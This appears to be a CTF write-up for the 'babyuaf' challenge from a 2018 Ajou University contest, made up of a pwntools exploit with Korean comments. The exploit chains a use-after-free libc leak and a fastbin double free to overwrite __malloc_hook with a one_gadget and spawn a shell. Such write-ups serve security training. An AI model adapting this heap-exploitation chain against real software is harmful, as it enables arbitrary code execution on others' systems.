2018 아주대 사이버보안학과 ctf - babyuaf

Binary

babyuaf

0.01MB

 

Mitigation

 

 

Exploit

from pwn import *
context.terminal=["terminator", "-e"]

p = process('./babyuaf')
e = ELF('./babyuaf')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

main_arana_offset = 0x3c4b20
free_hook_offset = libc.symbols['__free_hook']
one_gadget = [0x45226,0x4527a,0xf0364,0xf1207] # ldd local libc

def add_info(name, age, comment):
    p.sendlineafter('> ', "1")
    p.sendafter('name : ', name)
    p.sendafter('age : ', str(age))
    p.sendafter('comment : ', comment)
def delete_info(index):
    p.sendlineafter('> ', "2")
    p.sendlineafter('(0~4) : ', str(index))

def view_info(index):
    p.sendlineafter('> ', "3")
    p.sendlineafter('(0~4) : ', str(index))

def add_memo(size, memo):
    p.sendlineafter('> ', "4")
    p.sendafter('size : ', str(size))
    p.sendafter('memo : ', memo)

def delete_memo(index):
    p.sendlineafter('> ', "5")
    p.sendlineafter('(0~4) : ', str(index))

#uaf
add_info("A"*0x18, "100", "B"*0x10) # unsorted bin chunk
add_memo(16, "C"*8)
delete_info(0)
add_info("D"*8, "200", "E"*8)
view_info(0)

#main_arena+88 leak
p.recvuntil('DDDDDDDD')
leak = u64(p.recvuntil("\x7f")[-6:] + "\x00\x00") # libc_leak
libc_leak = leak - 88 - main_arana_offset
free_hook = libc_leak + free_hook_offset
malloc_hook = libc_leak + libc.symbols['__malloc_hook']
one_shot = libc_leak + one_gadget[3]
log.info('main_arena+88 leak : {}'.format(hex(leak)))
log.info('libc_leak : {}'.format(hex(libc_leak)))
log.info('free_hook : {}'.format(hex(free_hook)))

#DFG를 이용하여 원하는곳에 값을 쓸 수 있다.
add_memo(89, "a"*8) # 0x7f범위를 맞춰주기 위하여 89로 함.
add_memo(89, "b"*8)

delete_info(0)
delete_memo(1)
delete_memo(2)
delete_memo(1)

#DFG를 이용, malloc_hook-35(0x7f)쪽에 fake chunk을 생성
add_memo(89, p64(malloc_hook-35))
add_memo(89, "c"*8)
add_memo(89, "d"*8)
add_memo(89, "e"*19+p64(one_shot)+p64(0)*20) # malloc_hook을 one_shot가젯으로 덮는다!

#after > -> choose 1 -> malloc -> __malloc_hook(one_shot) -> shell!
p.interactive()